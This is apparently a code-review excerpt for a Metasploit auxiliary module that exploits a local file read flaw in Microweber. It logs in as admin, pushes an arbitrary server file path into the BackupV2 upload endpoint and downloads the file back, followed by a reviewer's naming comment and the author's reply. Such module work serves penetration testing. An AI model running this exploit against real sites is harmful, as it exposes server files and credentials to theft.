modules/auxiliary/gather/microweber_lfi.rb

```diff
@@ -0,0 +1,184 @@
+    res = send_request_cgi({
+      'method'    => 'POST',
+      'uri'       => normalize_uri(target_uri.path, 'api', 'user_login'),
+      'vars_post' => {
+        'username' => datastore['ADMIN_USER'],
+        'password' => datastore['ADMIN_PASS'],
+        'lang' => '',
+        'where_to' => 'admin_content'
+      }
+    })
+  
+    if res.headers['Content-Type'] == 'application/json'
+      jsonRes = res.get_json_document
+  
+      if res.code != 200
+        print_error 'Microweber cannot be reached.'
+        return false
+      end
+
+      if !jsonRes['error'].nil?
+        print_error jsonRes['error']
+        return false
+      end
+
+      if !jsonRes['success'].nil? && jsonRes['success'] == 'You are logged in'
+        print_good jsonRes['success']
+        @cookie = res.get_cookies
+        return true
+      end
+
+      print_error 'An unknown error occurred.'
+      return false
+    end
+
+    print_status res.body
+    return true  
+  end
+  
+  def upload
+    print_status 'Uploading ' + datastore['LOCAL_FILE_PATH'] + ' to the backup folder.'
+    res = send_request_cgi({
+      'method'    => 'GET',
+      'uri'       => normalize_uri(target_uri.path, 'api', 'BackupV2', 'upload'),
+      'cookie'    => @cookie,
+      'vars_get'  => {
+        'src' => datastore['LOCAL_FILE_PATH']
+      },
+      'headers'   => {
+        'Referer' => datastore['SSL'] ? 'https://' + datastore['RHOSTS'] + target_uri.path : 'http://' + datastore['RHOSTS'] + target_uri.path
+      }
+    })
+
+    if res.headers['Content-Type'] == 'application/json'
+      jsonRes = res.get_json_document
+
+      if jsonRes['success']
+        print_good jsonRes['success']
+        return true
+      end
+    end
+
+    print_error 'Either the file cannot be read or the file does not exist.'
+    return false
+  end
+
+  def download
+    filename = datastore['LOCAL_FILE_PATH'].include?('\\') ? datastore['LOCAL_FILE_PATH'].split('\\')[-1] : datastore['LOCAL_FILE_PATH'].split('/')[-1]
+    print_status 'Downloading ' + filename + ' from the backup folder.'
+
+    res = send_request_cgi({
+      'method'    => 'GET',
+      'uri'       => normalize_uri(target_uri.path, 'api', 'BackupV2', 'download'),
+      'cookie'    => @cookie,
+      'vars_get'  => {
+        'filename' => filename
+      },
+      'headers'   => {
+        'Referer' => datastore['SSL'] ? 'https://' + datastore['RHOSTS'] + target_uri.path : 'http://' + datastore['RHOSTS'] + target_uri.path
+      }
+    })
+
+    if res.headers['Content-Type'] == 'application/json'
+      jsonRes = res.get_json_document
+
+      if jsonRes['error']
+        print_error jsonRes['error']
+        return
+      end
+    end
+
+    print_status res.body
+  end
+
+  def run
+    is_version_valid = check_version
+    is_login_valid = login
+
+    if !is_version_valid || !is_login_valid
+      return
+    end
+
+    is_upload_successful = upload
+    if is_upload_successful
+      download
+    end
+  end
```

Comment:
The returned values are only used once. Rather than store the returned values in temporary variables with meaningful names, it would make more sense to simply give the methods meaningful names.

Reply:
Thanks. I fixed it.